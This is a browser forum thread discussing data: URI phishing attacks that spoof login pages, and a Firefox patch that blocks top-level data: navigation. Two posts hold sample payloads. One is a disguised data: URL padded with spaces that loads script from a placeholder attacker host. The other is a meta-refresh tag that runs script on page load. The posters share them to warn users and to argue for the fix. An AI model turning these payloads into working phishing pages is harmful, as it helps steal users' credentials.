Javascript execution exploit even with everything blocked

For the more technical/geeky chat subjects!

Moderator: satrow

User avatar
dark_moon
Knows the dark side
Knows the dark side
Posts: 3704
Joined: Mon Jan 09, 2012 5:34 pm
Location: Germany

Javascript execution exploit even with everything blocked

Postby dark_moon » Sat Dec 02, 2017 9:10 pm

(Everything blocked in uMatrix)

With this fixed bug: bug #1331351 (Consider blocking top level window data: URIs) from Firefox 56 this can be solved with the new about:config setting "security.data_uri.block_toplevel_data_uri_navigations" to "true"
Did have Pale Moon included that fix, or will it?

Its not a uMatrix related bug
Happy Pale Moon x64 under Win7 x64 User
German translator for Pale Moon 15+ and Pale Moon Commander addon

HowTo create a new Pale Moon Profile & use the Safe Mode
My GPG Key: 0x01EAFE95

joe04
Fanatic
Fanatic
Posts: 220
Joined: Mon Sep 28, 2015 4:38 pm
Location: US
Contact:

Re: Javascript execution exploit even with everything blocked

Postby joe04 » Sun Dec 03, 2017 12:15 am

This is an address bar fix to help prevent Gmail phishing schemes. (Read the link in the first bug post.)

How did you conclude this is a JS exploit?

User avatar
dark_moon
Knows the dark side
Knows the dark side
Posts: 3704
Joined: Mon Jan 09, 2012 5:34 pm
Location: Germany

Re: Javascript execution exploit even with everything blocked

Postby dark_moon » Sun Dec 03, 2017 9:39 am

Happy Pale Moon x64 under Win7 x64 User
German translator for Pale Moon 15+ and Pale Moon Commander addon

HowTo create a new Pale Moon Profile & use the Safe Mode
My GPG Key: 0x01EAFE95

joe04
Fanatic
Fanatic
Posts: 220
Joined: Mon Sep 28, 2015 4:38 pm
Location: US
Contact:

Re: Javascript execution exploit even with everything blocked

Postby joe04 » Sun Dec 03, 2017 6:47 pm

Right, it's malicious JS bundled in a data: blob. I don't consider that a true JS exploit, per se. It's a case of circumventing the normal JS sandboxing via the data: URI scheme, which is what this phishing attack does.

I would agree that if the Mozilla patch could be ported to PM/UXP then that would be a good thing assuming no adverse side effects.

But, overall, not a problem that should cause anyone to lose a wink of sleep. The #1 thing is pay attention to what links you click! That's always the best defense against phishing.

User avatar
dark_moon
Knows the dark side
Knows the dark side
Posts: 3704
Joined: Mon Jan 09, 2012 5:34 pm
Location: Germany

Re: Javascript execution exploit even with everything blocked

Postby dark_moon » Sun Dec 03, 2017 7:05 pm

joe04 wrote:The #1 thing is pay attention to what links you click! That's always the best defense against phishing.

Thats security by obscurity.
How you know the link is secure? How you know the link doesnt use a exploit?
Sure you can use attention but that doesnt help if the browser dont protect you against that.

Also the data:blob even load if you dont allow javascript for the testsite.
Now what?
Happy Pale Moon x64 under Win7 x64 User
German translator for Pale Moon 15+ and Pale Moon Commander addon

HowTo create a new Pale Moon Profile & use the Safe Mode
My GPG Key: 0x01EAFE95

joe04
Fanatic
Fanatic
Posts: 220
Joined: Mon Sep 28, 2015 4:38 pm
Location: US
Contact:

Re: Javascript execution exploit even with everything blocked

Postby joe04 » Sun Dec 03, 2017 7:14 pm

Let's be clear on how these data: URI phishing attacks actually work. From the link:

The way the attack works is that an attacker will send an email to your Gmail account. That email may come from someone you know who has had their account hacked using this technique. It may also include something that looks like an image of an attachment you recognize from the sender.

You click on the image, expecting Gmail to give you a preview of the attachment. Instead, a new tab opens up and you are prompted by Gmail to sign in again. You glance at the location bar and you see accounts.google.com in there. It looks like this….

Image


So what I said before is still true: for phishing, you must pay attention. ANY URL THAT BEGINS WITH data: IS NOT TO BE TRUSTED

joe04
Fanatic
Fanatic
Posts: 220
Joined: Mon Sep 28, 2015 4:38 pm
Location: US
Contact:

Re: Javascript execution exploit even with everything blocked

Postby joe04 » Sun Dec 03, 2017 7:17 pm

dark_moon wrote:Sure you can use attention but that doesnt help if the browser dont protect you against that.

Also the data:blob even load if you dont allow javascript for the testsite.
Now what?


Good point, and like I said it would be best to patch PM/UXP for this.

User avatar
Moonchild
Pale Moon guru
Pale Moon guru
Posts: 20065
Joined: Sun Aug 28, 2011 5:27 pm
Location: 58.5°N 15.5°E
Contact:

Re: Javascript execution exploit even with everything blocked

Postby Moonchild » Sun Dec 03, 2017 8:00 pm

The patch isn't a fix, because there is nothing to fix XD. (There is no fix for PEBCAK)
All it does is prevent data: URIs from being used in the address bar; it's an OK enhancement if you don't trust your own prowess on the web, and it does reduce potential phishing scenarios (especially because of principal inheritance keeping the state of the opener).
Help with this is welcome -- do note 2 follow-up bugs to the bz bug mentioned: bug #1395948 and bug #1394554
I've opened Issue #1528 to track and solve this enhancement implementation.
Improving Mozilla code: You know you're on the right track with code changes when you spend the majority of your time deleting code.

c7rax
Moongazer
Moongazer
Posts: 9
Joined: Sun Nov 12, 2017 1:06 pm

Re: Javascript execution exploit even with everything blocked

Postby c7rax » Tue Dec 05, 2017 3:28 pm

joe04 wrote:Image



What this "data:" protocol do and how much it is unsafe?

User avatar
gracious1
Astronaut
Astronaut
Posts: 647
Joined: Sun May 15, 2016 5:00 am
Location: snowy upstate NY
Contact:

Re: Javascript execution exploit even with everything blocked

Postby gracious1 » Wed Dec 06, 2017 4:46 am

c7rax wrote:
joe04 wrote:Image

What this "data:" protocol do and how much it is unsafe?


Perhaps this article will help:
Data URi Scheme
It's a way to reduce the number of HTTP requests, e.g. by fetching the style sheet inline, but it can be exploited easily by wrongdoers.
ImageBe not the first by whom the new are tried, nor yet the last to lay the old aside.

c7rax
Moongazer
Moongazer
Posts: 9
Joined: Sun Nov 12, 2017 1:06 pm

Re: Javascript execution exploit even with everything blocked

Postby c7rax » Wed Dec 06, 2017 8:04 pm

Oh well, and the enough for me was such example:
d@ta:text/html,https://login.yahoo.com/[ LARGE AMOUNT OF SPACES ]<skrypt src="//attacker.hack/opener/mask.skrypt"></skrypt>
to see how unsafe it can be, especially these "large amount of spaces" gives away a true intention of such website.

joe04
Fanatic
Fanatic
Posts: 220
Joined: Mon Sep 28, 2015 4:38 pm
Location: US
Contact:

Re: Javascript execution exploit even with everything blocked

Postby joe04 » Thu Dec 07, 2017 5:08 pm

c7rax wrote:Oh well, and the enough for me was such example:
d@ta:text/html,https://login.yahoo.com/[ LARGE AMOUNT OF SPACES ]<skrypt src="//attacker.hack/opener/mask.skrypt"></skrypt>
to see how unsafe it can be, especially these "large amount of spaces" gives away a true intention of such website.


Another good example of a phishing attack using this data: URI.

So if you see anything that starts with data:text/html in your address bar it's a RED FLAG and time to close that tab.

GrayFace
New to the forum
New to the forum
Posts: 2
Joined: Fri Dec 08, 2017 12:25 am

Re: Javascript execution exploit even with everything blocked

Postby GrayFace » Fri Dec 08, 2017 2:14 am

Clicking? Red flags? You wish!

Code: Select all

<meta http-equiv="refresh" content="0;URL=data:text/html,<script>alert('Oops!')</script>" />

Would execute the script when an infected page loads.

joe04
Fanatic
Fanatic
Posts: 220
Joined: Mon Sep 28, 2015 4:38 pm
Location: US
Contact:

Re: Javascript execution exploit even with everything blocked

Postby joe04 » Fri Dec 08, 2017 5:49 pm

True, the data:URI webpage JS could be anything (including your example snippet), and thus it would be good to patch this little hole in the browser. That's already been discussed in this thread and a Github issue filed.

I should add to my prior post that in the case of phishing emails, also report it to Google, Yahoo, or whoever your email provider is. (Over the years I've seen plenty of botnet spam/phishing emails in my webmail Spam folder, and have flagged the rare few that made it to my Inbox.)


Return to “Technical chat”

Who is online

Users browsing this forum: No registered users and 4 guests